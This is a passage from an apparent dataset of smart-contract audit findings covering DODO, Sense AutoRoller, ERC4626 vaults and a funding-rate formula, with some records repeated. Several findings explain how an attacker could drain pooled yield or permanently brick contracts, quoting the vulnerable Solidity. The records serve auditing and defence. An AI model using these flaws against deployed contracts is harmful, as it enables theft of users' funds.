swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nwe can add the check:\\n```\\nrequire(msg.value == fromTokenAmount, \"invalid ETH amount\");\\n```\\nчA lot of method that does not use WETH to settle the trade will not be callable.ч```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], \"DODORouteProxy: Not Whitelist Contract\"); \\n require(isApproveWhiteListedContract[approveTarget], \"DODORouteProxy: Not Whitelist Appprove Contract\"); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n -AutoRoller#eject can be used to steal all the yield from vault's YTsчhighчAutoRoller#eject collects all the current yield of the YTs, combines the users share of the PTs and YTs then sends the user the entire target balance of the contract. The problem is that combine claims the yield for ALL YTs, which sends the AutoRoller target assets. Since it sends the user the entire target balance of the contract it accidentally sends the user the yield from all the pool's YTs.\\n```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n\\nEject allows the user to leave the liquidity pool by withdrawing their liquidity from the Balancer pool and combining the PTs and YTs via divider.combine.\\n```\\nfunction combine(\\n address adapter,\\n uint256 maturity,\\n uint256 uBal\\n) external nonReentrant whenNotPaused returns (uint256 tBal) {\\n if (!adapterMeta[adapter].enabled) revert Errors.InvalidAdapter();\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n uint256 level = adapterMeta[adapter].level;\\n if (level.combineRestricted() && msg.sender != adapter) revert Errors.CombineRestricted();\\n\\n // Burn the PT\\n Token(series[adapter][maturity].pt).burn(msg.sender, uBal);\\n\\n //@audit call of interest\\n uint256 collected = _collect(msg.sender, adapter, maturity, uBal, uBal, address(0));\\n\\n // rest of code\\n\\n // Convert from units of Underlying to units of Target\\n tBal = uBal.fdiv(cscale);\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, msg.sender, tBal);\\n\\n // Notify only when Series is not settled as when it is, the _collect() call above would trigger a _redeemYT which will call notify\\n if (!settled) Adapter(adapter).notify(msg.sender, tBal, false);\\n unchecked {\\n // Safety: bounded by the Target's total token supply\\n tBal += collected;\\n }\\n emit Combined(adapter, maturity, tBal, msg.sender);\\n}\\n```\\n\\n```\\nfunction _collect(\\n address usr,\\n address adapter,\\n uint256 maturity,\\n uint256 uBal,\\n uint256 uBalTransfer,\\n address to\\n) internal returns (uint256 collected) {\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n if (!adapterMeta[adapter].enabled && !_settled(adapter, maturity)) revert Errors.InvalidAdapter();\\n\\n Series memory _series = series[adapter][maturity];\\n uint256 lscale = lscales[adapter][maturity][usr];\\n\\n // rest of code\\n\\n uint256 tBalNow = uBal.fdivUp(_series.maxscale); // preventive round-up towards the protocol\\n uint256 tBalPrev = uBal.fdiv(lscale);\\n unchecked {\\n collected = tBalPrev > tBalNow ? tBalPrev - tBalNow : 0;\\n }\\n\\n //@audit adapter.target is transferred to AutoRoller\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, usr, collected);\\n Adapter(adapter).notify(usr, collected, false); // Distribute reward tokens\\n\\n // rest of code\\n}\\n```\\n\\nInside divider#combine the collected yield from the YTs are transferred to the AutoRoller. The AutoRoller balance will now contain both the collected yield of the YTs and the target yielded by combining. The end of eject transfers this entire balance to the caller, effectively stealing the yield of the entire AutoRoller.чCombine returns the amount of target yielded by combining the PT and YT. This balance is the amount of assets that should be transferred to the user.чUser funds given to the wrong personч```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n -Adversary can brick AutoRoller by creating another AutoRoller on the same adapterчhighчonSponsorWindowOpened attempts to make a new series at the desired maturity. Each adapter can only have one of each maturity. If the maturity requested already exists then onSponsorWindowOpened will revert, making it impossible to roll the AutoRoller. An adversary can take advantage of this to brick an AutoRoller by creating a second AutoRoller on the same adapter that will create a target maturity before the first AutoRoller. Since the maturity now exists, the first AutoRoller will always revert when trying to Roll.\\n```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n\\nInside AutoRoller#onSponsorWindowOpened the maturity is calculated using RollerUtils#getFutureMaturity. This returns the timestamp the requested months ahead, truncated down to the first of the month. It passes this calculated maturity as the maturity to sponsor a new series.\\n```\\n(ERC20 _pt, YTLike _yt) = periphery.sponsorSeries(address(adapter), _maturity, true);\\n```\\n\\n```\\nfunction sponsorSeries(\\n address adapter,\\n uint256 maturity,\\n bool withPool\\n) external returns (address pt, address yt) {\\n (, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget();\\n\\n // Transfer stakeSize from sponsor into this contract\\n ERC20(stake).safeTransferFrom(msg.sender, address(this), stakeSize);\\n\\n // Approve divider to withdraw stake assets\\n ERC20(stake).approve(address(divider), stakeSize);\\n\\n (pt, yt) = divider.initSeries(adapter, maturity, msg.sender);\\n\\n // Space pool is always created for verified adapters whilst is optional for unverified ones.\\n // Automatically queueing series is only for verified adapters\\n if (verified[adapter]) {\\n poolManager.queueSeries(adapter, maturity, spaceFactory.create(adapter, maturity));\\n } else {\\n if (withPool) {\\n spaceFactory.create(adapter, maturity);\\n }\\n }\\n emit SeriesSponsored(adapter, maturity, msg.sender);\\n}\\n```\\n\\nperiphery#sponsorSeries is called with true indicating to create a space pool for the newly created series.\\n```\\nfunction create(address adapter, uint256 maturity) external returns (address pool) {\\n address pt = divider.pt(adapter, maturity);\\n _require(pt != address(0), Errors.INVALID_SERIES);\\n _require(pools[adapter][maturity] == address(0), Errors.POOL_ALREADY_EXISTS);\\n\\n pool = address(new Space(\\n vault,\\n adapter,\\n maturity,\\n pt,\\n ts,\\n g1,\\n g2,\\n oracleEnabled\\n ));\\n\\n pools[adapter][maturity] = pool;\\n}\\n```\\n\\nWe run into an issue inside SpaceFactory#create because it only allows a single pool per adapter/maturity. If a pool already exist then it will revert.\\nAn adversary can abuse this revert to brick an existing AutoRoller. Assume AutoRoller A has a duration of 3 months. Its current maturity is December 1st 2022, when rolled it will attempt to create a series at March 1st 2023. An adversary could abuse this and create AutoRoller B with a maturity of 4 months. When they roll for the first time it will create a series with maturity at March 1st 2023. When AutoRoller A attempts to roll it will revert since a series already exists at March 1st 2023.\\nThis conflict can happen accidentally if there is a monthly AutoRoller and a quarterly AutoRoller. It also hinders the viability of using an AutoRoller for an adapter that is popular because the series will likely have been created by the time the autoroller tries to roll into it.чRequiring that the AutoRoller has to create the series seems overly restrictive and leads to a large number of issues. Attempting to join an a series that is already initialized could also lead to pool manipulation rates. It seems like a large refactoring is needed for the rolling section of the AutoRollerчAutoRollers will frequently be brickedч```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n -Hardcoded divider address in RollerUtils is incorrect and will brick autorollerчmediumчRollerUtils uses a hard-coded constant for the Divider. This address is incorrect and will cause a revert when trying to call AutoRoller#cooldown. If the adapter is combineRestricted then LPs could potentially be unable to withdraw or eject.\\n```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n\\nRollerUtils uses a hardcoded constant DIVIDER to store the Divider address. There are two issues with this. The most pertinent issue is that the current address used is not the correct mainnet address. The second is that if the divider is upgraded, changing the address of the RollerUtils may be forgotten.\\n```\\n (, uint48 prevIssuance, , , , , uint256 iscale, uint256 mscale, ) = DividerLike(DIVIDER).series(adapter, prevMaturity);\\n```\\n\\nWith an incorrect address the divider#series call will revert causing RollerUtils#getNewTargetedRate to revert, which is called in AutoRoller#cooldown. The result is that the AutoRoller cycle can never be completed. LP will be forced to either withdraw or eject to remove their liquidity. Withdraw only works to a certain point because the AutoRoller tries to keep the target ratio. After which the eject would be the only way for LPs to withdraw. During eject the AutoRoller attempts to combine the PT and YT. If the adapter is also combineRestricted then there is no longer any way for the LPs to withdraw, causing loss of their funds.чRollerUtils DIVIDER should be set by constructor. Additionally RollerUtils should be deployed by the factory constructor to make sure they always have the same immutable divider reference.чIncorrect hard-coded divider address will brick autorollers for all adapters and will cause loss of funds for combineRestricted adaptersч```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n -AutoRoller#eject can be used to steal all the yield from vault's YTsчhighчAutoRoller#eject collects all the current yield of the YTs, combines the users share of the PTs and YTs then sends the user the entire target balance of the contract. The problem is that combine claims the yield for ALL YTs, which sends the AutoRoller target assets. Since it sends the user the entire target balance of the contract it accidentally sends the user the yield from all the pool's YTs.\\n```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n\\nEject allows the user to leave the liquidity pool by withdrawing their liquidity from the Balancer pool and combining the PTs and YTs via divider.combine.\\n```\\nfunction combine(\\n address adapter,\\n uint256 maturity,\\n uint256 uBal\\n) external nonReentrant whenNotPaused returns (uint256 tBal) {\\n if (!adapterMeta[adapter].enabled) revert Errors.InvalidAdapter();\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n uint256 level = adapterMeta[adapter].level;\\n if (level.combineRestricted() && msg.sender != adapter) revert Errors.CombineRestricted();\\n\\n // Burn the PT\\n Token(series[adapter][maturity].pt).burn(msg.sender, uBal);\\n\\n //@audit call of interest\\n uint256 collected = _collect(msg.sender, adapter, maturity, uBal, uBal, address(0));\\n\\n // rest of code\\n\\n // Convert from units of Underlying to units of Target\\n tBal = uBal.fdiv(cscale);\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, msg.sender, tBal);\\n\\n // Notify only when Series is not settled as when it is, the _collect() call above would trigger a _redeemYT which will call notify\\n if (!settled) Adapter(adapter).notify(msg.sender, tBal, false);\\n unchecked {\\n // Safety: bounded by the Target's total token supply\\n tBal += collected;\\n }\\n emit Combined(adapter, maturity, tBal, msg.sender);\\n}\\n```\\n\\n```\\nfunction _collect(\\n address usr,\\n address adapter,\\n uint256 maturity,\\n uint256 uBal,\\n uint256 uBalTransfer,\\n address to\\n) internal returns (uint256 collected) {\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n if (!adapterMeta[adapter].enabled && !_settled(adapter, maturity)) revert Errors.InvalidAdapter();\\n\\n Series memory _series = series[adapter][maturity];\\n uint256 lscale = lscales[adapter][maturity][usr];\\n\\n // rest of code\\n\\n uint256 tBalNow = uBal.fdivUp(_series.maxscale); // preventive round-up towards the protocol\\n uint256 tBalPrev = uBal.fdiv(lscale);\\n unchecked {\\n collected = tBalPrev > tBalNow ? tBalPrev - tBalNow : 0;\\n }\\n\\n //@audit adapter.target is transferred to AutoRoller\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, usr, collected);\\n Adapter(adapter).notify(usr, collected, false); // Distribute reward tokens\\n\\n // rest of code\\n}\\n```\\n\\nInside divider#combine the collected yield from the YTs are transferred to the AutoRoller. The AutoRoller balance will now contain both the collected yield of the YTs and the target yielded by combining. The end of eject transfers this entire balance to the caller, effectively stealing the yield of the entire AutoRoller.чCombine returns the amount of target yielded by combining the PT and YT. This balance is the amount of assets that should be transferred to the user.чUser funds given to the wrong personч```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n -Adversary can brick AutoRoller by creating another AutoRoller on the same adapterчhighчonSponsorWindowOpened attempts to make a new series at the desired maturity. Each adapter can only have one of each maturity. If the maturity requested already exists then onSponsorWindowOpened will revert, making it impossible to roll the AutoRoller. An adversary can take advantage of this to brick an AutoRoller by creating a second AutoRoller on the same adapter that will create a target maturity before the first AutoRoller. Since the maturity now exists, the first AutoRoller will always revert when trying to Roll.\\n```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n\\nInside AutoRoller#onSponsorWindowOpened the maturity is calculated using RollerUtils#getFutureMaturity. This returns the timestamp the requested months ahead, truncated down to the first of the month. It passes this calculated maturity as the maturity to sponsor a new series.\\n```\\n(ERC20 _pt, YTLike _yt) = periphery.sponsorSeries(address(adapter), _maturity, true);\\n```\\n\\n```\\nfunction sponsorSeries(\\n address adapter,\\n uint256 maturity,\\n bool withPool\\n) external returns (address pt, address yt) {\\n (, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget();\\n\\n // Transfer stakeSize from sponsor into this contract\\n ERC20(stake).safeTransferFrom(msg.sender, address(this), stakeSize);\\n\\n // Approve divider to withdraw stake assets\\n ERC20(stake).approve(address(divider), stakeSize);\\n\\n (pt, yt) = divider.initSeries(adapter, maturity, msg.sender);\\n\\n // Space pool is always created for verified adapters whilst is optional for unverified ones.\\n // Automatically queueing series is only for verified adapters\\n if (verified[adapter]) {\\n poolManager.queueSeries(adapter, maturity, spaceFactory.create(adapter, maturity));\\n } else {\\n if (withPool) {\\n spaceFactory.create(adapter, maturity);\\n }\\n }\\n emit SeriesSponsored(adapter, maturity, msg.sender);\\n}\\n```\\n\\nperiphery#sponsorSeries is called with true indicating to create a space pool for the newly created series.\\n```\\nfunction create(address adapter, uint256 maturity) external returns (address pool) {\\n address pt = divider.pt(adapter, maturity);\\n _require(pt != address(0), Errors.INVALID_SERIES);\\n _require(pools[adapter][maturity] == address(0), Errors.POOL_ALREADY_EXISTS);\\n\\n pool = address(new Space(\\n vault,\\n adapter,\\n maturity,\\n pt,\\n ts,\\n g1,\\n g2,\\n oracleEnabled\\n ));\\n\\n pools[adapter][maturity] = pool;\\n}\\n```\\n\\nWe run into an issue inside SpaceFactory#create because it only allows a single pool per adapter/maturity. If a pool already exist then it will revert.\\nAn adversary can abuse this revert to brick an existing AutoRoller. Assume AutoRoller A has a duration of 3 months. Its current maturity is December 1st 2022, when rolled it will attempt to create a series at March 1st 2023. An adversary could abuse this and create AutoRoller B with a maturity of 4 months. When they roll for the first time it will create a series with maturity at March 1st 2023. When AutoRoller A attempts to roll it will revert since a series already exists at March 1st 2023.\\nThis conflict can happen accidentally if there is a monthly AutoRoller and a quarterly AutoRoller. It also hinders the viability of using an AutoRoller for an adapter that is popular because the series will likely have been created by the time the autoroller tries to roll into it.чRequiring that the AutoRoller has to create the series seems overly restrictive and leads to a large number of issues. Attempting to join an a series that is already initialized could also lead to pool manipulation rates. It seems like a large refactoring is needed for the rolling section of the AutoRollerчAutoRollers will frequently be brickedч```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n -Public vault : Initial depositor can manipulate the price per share value and future depositors are forced to deposit huge value in vault.чhighчMost of the share based vault implementation will face this issue. The vault is based on the ERC4626 where the shares are calculated based on the deposit value. By depositing large amount as initial deposit, initial depositor can influence the future depositors value.\\nBy depositing large amount as initial deposit, first depositor can take advantage over other depositors.\\nI am sharing reference for this type of issue that already reported and acknowledged. This explain how the share price could be manipulated to large value.\\nERC4626 implementation function mint(uint256 shares, address receiver) public virtual returns (uint256 assets) { assets = previewMint(shares); // No need to check for rounding error, previewMint rounds up.\\n```\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n\\n function previewMint(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares.mulDivUp(totalAssets(), supply);\\n}\\n```\\nчConsider requiring a minimal amount of share tokens to be minted for the first minter, and send a portion of the initial mints as a reserve to the DAO/ burn so that the price per share can be more resistant to manipulation.чFuture depositors are forced for huge value of asset to deposit. It is not practically possible for all the users. This could directly affect on the attrition of users towards this system.ч```\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n\\n function previewMint(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares.mulDivUp(totalAssets(), supply);\\n}\\n```\\n -Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.чmediumчMath rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.\\nFinally, ERC-4626 Vault implementers should be aware of the need for specific, opposing rounding directions across the different mutable and view methods, as it is considered most secure to favor the Vault itself during calculations over its users:\\nIf (1) it's calculating how many shares to issue to a user for a certain amount of the underlying tokens they provide or (2) it's determining the amount of the underlying tokens to transfer to them for returning a certain amount of shares, it should round down. If (1) it's calculating the amount of shares a user has to supply to receive a given amount of the underlying tokens or (2) it's calculating the amount of underlying tokens a user has to provide to receive a certain amount of shares, it should round up.\\nThen previewWithdraw in AutoRoller.sol should round up.\\nThe original implementation for previewWithdraw in Solmate ERC4626 is:\\n```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n\\nIt is rounding up, however in the implementation of the AutoRoller.sol#previewWith is not round up.\\n```\\nfor (uint256 i = 0; i < 20;) { // 20 chosen as a safe bound for convergence from practical trials.\\n if (guess > supply) {\\n guess = supply;\\n }\\n\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n\\n if (answer >= 0 && answer <= assets.mulWadDown(0.001e18).safeCastToInt() || (prevAnswer == answer)) { // Err on the side of overestimating shares needed. Could reduce precision for gas efficiency.\\n break;\\n }\\n\\n if (guess == supply && answer < 0) revert InsufficientLiquidity();\\n\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n\\n unchecked { ++i; }\\n}\\n\\nreturn guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nnote the line:\\n```\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n```\\n\\npreviewRedeem is round down.\\nand later we update guess and return guess\\n```\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n```\\n\\nand\\n```\\n return guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nwhen calculating the the nextGuess, the code does not round up.\\n```\\nint256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n```\\nчRound up in previewWithdraw using mulDivUp and divWadUpчOther protocols that integrate with Sense finance AutoRoller.sol might wrongly assume that the functions handle rounding as per ERC4626 expectation. Thus, it might cause some intergration problem in the future that can lead to wide range of issues for both parties.ч```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n -Funding Rate calculation is not correctчmediumчAccording to the docs, the Funding Rate is intended to correspond to the gap between long and short positions that the Float Pool is required to make up. However, as its implemented, the `totalFunding` is calculated only on the size of the overbalanced position, leading to some unexpected situations.\\nAccording to the comments, `totalFunding` is meant to be calculated as follows:\\ntotalFunding is calculated on the notional of between long and short liquidity and 2x long and short liquidity.\\nThis makes sense. The purpose of the funding rate is to compensate the Float Pool for the liquidity provided to balance the market.\\nHowever, the implementation of this function does not accomplish this. Instead, `totalFunding` is based only on the size of the overbalancedValue:\\n```\\nuint256 totalFunding = (2 * overbalancedValue * fundingRateMultiplier * oracleManager.EPOCH_LENGTH()) / (365.25 days * 10000);\\n```\\n\\nThis can be summarized as `2 * overbalancedValue * funding rate percentage * epochs / yr`.\\nThis formula can cause problems, because the size of the overbalanced value doesn't necessarily correspond to the balancing required for the Float Pool.\\nFor these examples, let's set:\\n`fundingRateMultiplier = 100` (1%)\\n`EPOCH_LENGTH() = 3.6525 days` (1% of a year)\\nSITUATION A:\\nOverbalanced: LONG\\nLong Effective Liquidity: 1_000_000 ether\\nShort Effective Liquidity: 999_999 ether\\n`totalFunding = 2 * 1_000_000 ether * 1% * 1% = 200 ether`\\nAmount of balancing supplied by Float = 1mm - 999,999 = 1 ether\\nSITUATION B:\\nOverbalanced: LONG\\nLong Effective Liquidity: 1_000 ether\\nShort Effective Liquidity: 100 ether\\n`totalFunding = 2 * 1_000 ether * 1% * 1% = 0.2 ether`\\nAmount of balancing supplied by Float = 1000 - 100 = 900 ether\\nWe can see that in Situation B, Float supplied 900X more liquidity to the system, and earned 1000X less fees.чAdjust the `totalFunding` formula to represent the stated outcome. A simple example of how that might be accomplished is below, but I'm sure there are better implementations:\\n```\\nuint256 totalFunding = ((overbalancedValue - underbalancedValue) * fundingRateMultiplier * oracle.EPOCH_LENGTH()) / (365.25 days * 10_000);\\n```\\nчFunding Rates will not accomplish the stated objective, and will serve to incentivize pools that rely heavily on Float for balancing, while disincentivizing large, balanced markets.ч```\\nuint256 totalFunding = (2 * overbalancedValue * fundingRateMultiplier * oracleManager.EPOCH_LENGTH()) / (365.25 days * 10000);\\n```\\n -Hardcoded divider address in RollerUtils is incorrect and will brick autorollerчmediumчRollerUtils uses a hard-coded constant for the Divider. This address is incorrect and will cause a revert when trying to call AutoRoller#cooldown. If the adapter is combineRestricted then LPs could potentially be unable to withdraw or eject.\\n```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n\\nRollerUtils uses a hardcoded constant DIVIDER to store the Divider address. There are two issues with this. The most pertinent issue is that the current address used is not the correct mainnet address. The second is that if the divider is upgraded, changing the address of the RollerUtils may be 